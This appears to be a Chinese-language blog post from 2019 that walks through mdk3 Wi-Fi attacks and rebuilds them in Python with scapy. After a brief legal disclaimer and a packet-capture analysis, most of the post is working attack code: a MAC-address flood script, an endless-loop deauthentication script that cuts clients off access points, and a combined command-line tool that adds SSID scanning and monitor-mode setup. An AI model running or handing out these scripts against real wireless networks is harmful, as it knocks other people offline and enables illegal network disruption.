py_wifi_dos

  1. 前言
  2. 分析mdk3的攻击
  3. 代码集合体
  4. 总结

前言

距离放寒假还有10天左右,这个星期继续在实验室折腾。突然对mdk3感兴趣,然后逐步了解写出一个脚本。

提醒:本文仅安全研究学习,若是违法被抓作者不负责
221348-151040962861e7.jpg

分析mdk3的攻击

先开启网卡监听模式

airmon-ng start <iface>

首先是Mac洪水攻击

mdk3 <iface> a -a <bssid>

没攻击之前:
FT2zPU.png

攻击中
FTRPM9.png

wireshark抓到的包:
FTR5e1.md.png

FTRLSe.png

分析

Receiver address: 接收地址(Client)
Destination address:目的地地址(Client)
Transmitter address:发射地址(AP)
BSSID:BSSID

猜想:

MAC水攻击也就是生成批量的MAC的地址,然后构造请求AP验证的数据包
(也就是说只有请求包,不需要构造响应包)

所以一和二为一样的,接着去scapy找对应的函数。
FTWewq.md.png
FTWUk6.md.png

合三为一查看帮助:
FTW60I.png

RadioTap()经过对比,发现可以保持默认即可
Dot11() 里的addr1填目标MAC地址,这里全部客户端攻击填写:FF:FF:FF:FF:FF:FF或者填指定的MAC
addr2和addr3填AP地址
Dot11Beacon() 保持默认或自行更改

MAC洪水攻击代码:

#coding:utf-8
'''
@author:九世
@time:2019/1/3
'''
from scapy.all import *
import threading

n=[]
m=[]

yser=input("RMAC:")

def dos(mac):
    for k in range(65, 71):
        n.append(chr(k))

    for q in range(0, 9):
        m.append(q)
    #批量生成MAC
    for v in n:
        for l in m:
            for k in n:
                for w in m:
                    for s in n:
                        for mq in m:
                            for q in n:
                                for p in m:
                                    for o in n:
                                        for g in m:
                                            for we in n:
                                                for wq in m:
                                                    macs = "{}{}:{}{}:{}{}:{}{}:{}{}:{}{}".format(v, l, k, w, s, mq, q,p, o, g, we, wq)
                                                    data=RadioTap()/Dot11(subtype=11,addr1="ff:ff:ff:ff:ff:ff",addr2="{}".format(macs),addr3=mac,addr4=mac)/Dot11Beacon(timestamp=70180) #构造数据包
                                                    sendp(data,iface="mon0")

if __name__ == '__main__':
    t=threading.Thread(target=dos,args=("{}".format(yser),))
    t.start()

攻击效果:
FTWH7q.md.png

Deauch attack攻击

Deauch攻击就是伪造AP断开连接的数据包发送给AP还有客户端。造成无法连接到网络

通过刚刚说的话可以获得一个关键信息,我们要构造两个数据包。一个发送给AP一个发送给客户实现欺骗。

wireshark抓包分析

FTf0U0.png

欺骗AP
FTfs8U.png

那么用到的scapy函数如下:

RadioTap()/Dot11()/Dot11Deauth()

demo代码:

from scapy.all import *

#构造一个发送给客户端的包和一个给AP的包
while True:
    deauth_pkt1 = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2="<you MAC>", addr3="<you MAC>") / Dot11Deauth()
    deauth_pkt2 = RadioTap()/Dot11(addr1="<you MAC>", addr2="ff:ff:ff:ff:ff:ff", addr3="ff:ff:ff:ff:ff:ff") / Dot11Deauth()
    sendp(deauth_pkt1,iface="mon0")
    sendp(deauth_pkt2,iface="mon0")

测试结果:
FTfjat.md.png

手机也有一个测试但是没有视频很难看出效果,给我师父可以拿代码自行测试

代码集合体

由于当事人的能力不足,导致自己处于不利的地位 --《小黑发金木*金木*340号 金木*小白发金木*佐佐木 绯世*黑色死神 金木*独眼之王 金木*天使形态 金木》

代码:

'''
@author:jiushi
@time:2019/1/4
'''
#-*-coding:utf-8-*-
from scapy.all import *
import optparse
import os

banner="""
signature:今生今世非你不娶
"""
print(banner)
print('[!] Reminder: This tool needs to install the airmon-ng tool.')
print('')
print('')
print('1.Generate a large number of mac addresses for flood attacks')
print('2.Dot11Deauch attack')
print('3.SSID and MAC scan')
print('4.NIC open monitor mode')
print('')
print('')

mac_list=[]
ssid_list=[]

def main():
    parser=optparse.OptionParser()
    parser.add_option('-r',dest='rmac',help='rhost_mac')
    parser.add_option('-m',dest='macaddresses',help='mac addresses',action='store_true')
    parser.add_option('-d',dest='deauch',help='Deauch attack',action='store_true')
    parser.add_option('-s',dest='scan',help='ssid and macscan',action='store_true')
    parser.add_option('-f',dest='iface',help='network iface',action='store')
    parser.add_option('-t',dest='start',help='nic open monitor mode',action='store_true')
    (options,args)=parser.parse_args()
    if options.macaddresses and options.iface and options.rmac:
        ifaces=options.iface
        rsmac=options.rmac
        mac_addresses(ifaces,rsmac)
    elif options.deauch and options.iface and options.rmac:
        iface2=options.iface
        rs2mac=options.rmac
        attack(iface2,rs2mac)
    elif options.scan and options.iface:
        iface3=options.iface
        xj=open('save.txt','w')
        xj.close()
        print('[+] SSID scan:')
        print('[!] Ctrl+C stop')
        print('')
        print('')
        sniff(iface=iface3,prn=scan)
    elif options.start and options.iface:
        iface0=options.iface
        start(iface0)
    else:
        parser.print_help()
        exit()

def mac_addresses(iface1,rsmac):
    print('[+] mac_addresses')
    print('')
    n=[]
    m=[]
    for k in range(65, 71):
        n.append(chr(k))

    for q in range(0, 9):
        m.append(q)
    for v in n:
        for l in m:
            for k in n:
                for w in m:
                    for s in n:
                        for mq in m:
                            for q in n:
                                for p in m:
                                    for o in n:
                                        for g in m:
                                            for we in n:
                                                for wq in m:
                                                    macss = "{}{}:{}{}:{}{}:{}{}:{}{}:{}{}".format(v, l, k, w, s, mq, q,p, o, g, we, wq)
                                                    data=RadioTap()/Dot11(subtype=11,addr1="ff:ff:ff:ff:ff:ff",addr2="{}".format(macss),addr3=rsmac,addr4=rsmac)/Dot11Beacon(timestamp=70180)
                                                    sendp(data,iface=iface1)

def attack(iface2,rs2mac):
    print('[+] Dot11Deauth attak')
    print('')
    while True:
        data2=RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=rs2mac,addr3=rs2mac)/Dot11Deauth()
        data3=RadioTap()/Dot11(addr1=rs2mac,addr2="ff:ff:ff:ff:ff:ff",addr3="ff:ff:ff:ff:ff:ff")/Dot11Deauth()
        sendp(data2,iface=iface2)
        sendp(data3,iface=iface2)

def scan(jianting):
    if jianting.haslayer(Dot11Elt):
        if jianting.type==0 and jianting.subtype==8:
            if not jianting.addr2 in mac_list:
                mac_list.append(jianting.addr2)
                ssid_list.append(jianting.info)
                print('[+] MAC:{} SSID:{}'.format(jianting.addr2,bytes.decode(jianting.info,encoding='utf-8')))
                print('MAC:{} SSID:{}'.format(jianting.addr2,bytes.decode(jianting.info,encoding='utf-8')),file=open('save.txt','a'))

def start(iface0):
    print('[+] start mon')
    print('')
    print('')
    os.system('sudo airmon-ng start {}'.format(iface0))

if __name__ == '__main__':
    main()

效果测试:
SSID扫描

FThEaq.png

MAC洪水攻击
FThMM4.png

Deauch攻击
FThMM4.png

FThYi6.png

防止mdk3的攻击:有人说只能等协议更新有人说YouTube上防御教程。各位师父自行了解
github地址:python/wifidos at master · 422926799/python · GitHub

总结

当遇到需要分析数据包的时候耐心的对比和分析。去scapy寻找对应的协议函数,进行构造发送。不懂及时搜索。

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:py_wifi_dos

本文作者:九世

发布时间:2019-01-04, 19:31:34

最后更新:2019-04-19, 20:36:16

原始链接:http://422926799.github.io/posts/37ff80c8.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录